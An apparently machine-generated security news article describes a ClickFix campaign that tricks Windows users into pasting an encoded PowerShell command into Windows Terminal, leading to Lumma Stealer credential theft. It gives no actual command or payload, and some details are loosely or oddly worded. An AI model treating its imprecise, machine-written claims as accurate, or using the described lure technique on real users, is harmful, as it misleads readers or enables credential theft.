Ethical Hacking News
The ClickFix scam has evolved again, using Windows Terminal to trick users into running malware that compromises their browser vaults. With Microsoft monitoring the situation closely, it's essential for users to remain vigilant and report any suspicious activity.
The ClickFix scam has been using social engineering tactics to trick users into running malicious commands that steal credentials. The scammers have adapted their tactics to exploit the legitimate administrative tool, Windows Terminal. The new campaign instructs users to launch Windows Terminal using a specific shortcut to avoid detection by security tools. The scam presents victims with a web page posing as a verification prompt or troubleshooting guide, asking them to copy and paste a command into Windows Terminal. The malicious command unpacks itself, pulling down renamed copies of the 7-Zip archive utility and compressed payloads. The 7-Zip archive tool extracts further components that establish persistence on the compromised system and collect sensitive data. The final stage deploys Lumma Stealer, an infostealer designed to steal login credentials and other browser data. Security awareness is crucial in preventing similar attacks from succeeding as users continue to rely on Windows Terminal for everyday tasks.
The ClickFix scam has been a persistent threat to Windows users for over a year, relying on a tried-and-tested social engineering formula to persuade victims into running malicious commands that ultimately result in credential theft. The scammers have continued to adapt their tactics to evade security tools, with the latest iteration exploiting the legitimate administrative tool, Windows Terminal.
According to Microsoft Threat Intelligence, the new campaign surfaced in February and tweaked the familiar ClickFix playbook by instructing users to launch Windows Terminal using the Windows + X → I shortcut. This approach exploits the fact that security tools have become proficient at detecting suspicious activity launched from the Run dialog, a legitimate shortcut used by many developers for everyday tasks.
The scam itself remains faithful to its social engineering roots, presenting victims with a web page posing as a verification prompt, CAPTCHA check, or troubleshooting guide. The page then instructs users to copy and paste a command into Windows Terminal, often framed as an innocuous action such as verifying their connection or fixing an error.
What the unsuspecting user does not realize is that they are about to execute a heavily encoded PowerShell command that sets off a chain of events designed to compromise their system. This command unpacks itself, pulling down renamed copies of 7-Zip archive utility and compressed payloads along with other malicious components.
The 7-Zip archive tool then extracts further components that establish persistence on the compromised system, disable Microsoft Defender exclusions, and begin collecting sensitive system and browser data. The final stage deploys Lumma Stealer, a common infostealer designed to inject itself into Chrome and Edge processes, siphoning off stored login credentials and other browser goodies.
The use of Windows Terminal as a vector for the attack is particularly insidious, as it allows the attackers to blend in with legitimate system activity, making it less likely that security tools will detect the malicious command. This approach demonstrates the evolving nature of the ClickFix scam, which continues to adapt and exploit vulnerabilities in the user experience.
The Lumma Stealer infostealer has been associated with various credential-stealing campaigns in recent times, and its deployment via the ClickFix scam highlights the potential for widespread compromise through social engineering tactics. As users continue to rely on Windows Terminal as a legitimate tool for everyday tasks, security awareness must be heightened to prevent similar attacks from succeeding.
In light of this latest development, Microsoft has confirmed that it is monitoring the situation closely, urging users to exercise caution when encountering suspicious prompts or instructions that require running malicious commands. Users are advised to remain vigilant and report any instances of suspicious activity to the relevant authorities.
In conclusion, the ClickFix scam continues to evolve, incorporating new tactics to evade security tools and compromise user systems. As with previous iterations, the use of Windows Terminal as a vector for the attack underscores the importance of user awareness and vigilance in preventing similar attacks from succeeding.
Related Information:
https://www.ethicalhackingnews.com/articles/The-Evolving-ClickFix-Scam-A-New-Twist-on-Credential-Stealing-and-Malware-ehn.shtml
https://go.theregister.com/feed/www.theregister.com/2026/03/06/microsoft_spots_clickfix_campaign_abusing/
https://www.msn.com/en-us/technology/cybersecurity/microsoft-spots-clickfix-campaign-getting-users-to-self-pwn-on-windows-terminal/ar-AA1XF58v
https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
Published: Fri Mar 6 10:12:58 2026 by llama3.2 3B Q4_K_M
